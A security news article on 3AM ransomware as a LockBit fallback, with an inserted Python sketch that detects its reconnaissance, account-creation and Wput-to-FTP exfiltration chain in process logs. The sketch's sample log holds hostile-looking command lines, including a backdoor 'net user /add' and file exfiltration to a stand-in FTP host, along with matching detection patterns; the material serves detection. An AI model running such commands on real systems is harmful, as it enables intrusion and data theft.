3AM ransomware is the latest entrant to join the threat landscape

October 5, 2023

A new strain of malicious software, 3AM ransomware, has emerged in the threat landscape after appearing in one of LockBit’s cybercriminal operations. The LockBit operators used this tool as a backup plan in case the target’s defenders blocked their primary infection mechanism.

The ransomware process starts with a “gpresult” command, which extracts the policy settings applied to the targeted user’s system. Next, the threat actors deploy several components of the notorious Cobalt Strike framework to extend their control over the targeted network. Specifically, the attackers use PsExec to obtain higher privileges within the infected system.

The operators’ reconnaissance goes further as they execute additional commands, such as “whoami,” “netstat,” “quser,” and “net share,” to gather critical information about the system and network. The actors then create a new user account for persistence and use the Wput tool to exfiltrate victim files to an attacker-controlled FTP server.
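As an added illustration that is not part of the original article, the following Python sketch scans constructed process-creation log lines and flags a host that shows the chain described above: a burst of the named reconnaissance commands, a new user created with “net user … /add,” and Wput pushing files to an FTP server. The tab-separated log format, the three-tools-in-ten-minutes threshold and the sample hosts, accounts and FTP address are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta
RECON_CMDS = {"gpresult", "whoami", "netstat", "quser", "net"}  # net = 'net share'
RECON_BURST = 3                 # distinct recon tools on one host ... (assumed threshold)
WINDOW = timedelta(minutes=10)  # ... within this window raises a finding (assumed)
# Constructed sample log, tab-separated: timestamp, host, user, command line.
SAMPLE_LOG = """\
2023-09-01T03:02:10\tSRV01\tCORP\\svc_backup\tgpresult.exe /z
2023-09-01T03:03:45\tSRV01\tCORP\\svc_backup\twhoami.exe
2023-09-01T03:04:02\tSRV01\tCORP\\svc_backup\tnetstat.exe -ano
2023-09-01T03:04:30\tSRV01\tCORP\\svc_backup\tquser.exe
2023-09-01T03:05:10\tSRV01\tCORP\\svc_backup\tnet.exe share
2023-09-01T03:09:55\tSRV01\tCORP\\svc_backup\tnet.exe user backup_adm P@ss /add
2023-09-01T03:20:12\tSRV01\tCORP\\svc_backup\twput.exe C:\\Share\\*.docx ftp://203.0.113.10/up/
2023-09-01T09:15:00\tWS17\tCORP\\alice\twhoami.exe
""".splitlines()

def parse_line(line):
    ts, host, _user, cmdline = line.split("\t", 3)
    exe = cmdline.split()[0].lower().replace(".exe", "")
    return {"ts": datetime.fromisoformat(ts), "host": host, "exe": exe, "args": cmdline.lower()}

def classify(ev):
    # Map one process event to a behaviour named in the write-up, or None.
    exe, args = ev["exe"], ev["args"]
    if exe in RECON_CMDS and (exe != "net" or " share" in args):
        return "recon"
    if exe == "net" and " user " in args and "/add" in args:
        return "new_user"    # persistence via a newly created account
    if exe == "wput" and "ftp://" in args:
        return "ftp_exfil"   # Wput pushing files to an FTP server
    return None

def detect(lines):
    # Return {host: sorted findings} for every host showing at least one behaviour.
    events = defaultdict(list)
    for line in lines:
        if kind := classify(ev := parse_line(line)):
            events[ev["host"]].append((ev["ts"], kind, ev["exe"]))
    findings = {}
    for host, evs in events.items():
        flags = {k for _, k, _ in evs if k != "recon"}
        recon = [(t, e) for t, k, e in evs if k == "recon"]
        for t0, _ in recon:  # count distinct recon tools in the window starting at t0
            if len({e for t, e in recon if timedelta(0) <= t - t0 <= WINDOW}) >= RECON_BURST:
                flags.add("recon_burst")
        if flags:
            findings[host] = sorted(flags)
    return findings
```

A single `whoami` on WS17 produces no finding; only the clustered sequence on SRV01 is reported, which keeps routine administrative use from triggering the rule.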


LockBit’s backup plan is to launch the 3AM ransomware.


The LockBit operators launch the 3AM ransomware if their first attempt at an attack fails. The actors deploy this ransomware on three systems within a compromised network to increase their chances of success. The ransom note also explicitly states the name of the ransomware, which leaves no doubt about which threat actor executed the campaign.

The newly discovered ransomware has appeared in multiple cybercriminal operations, but little is known about it so far. The LockBit ransomware group and its affiliates are currently the primary users of the strain, but other cybercriminals could adopt the same tool soon, potentially resulting in more attacks.

The authors of this new tool wrote the ransomware in the Rust programming language, following a growing trend among malware developers creating ransomware. Organisations and cybersecurity providers should therefore invest more in thorough investigation of the Indicators of Compromise (IOCs) linked to this ransomware strain to bolster their defences.

Every organisation should adopt a modern Threat Intelligence Platform (TIP) service, since it can enhance detection mechanisms and investigation capabilities. Organisations should also prioritise acquiring real-time protection services to prevent such campaigns and protect their digital assets.
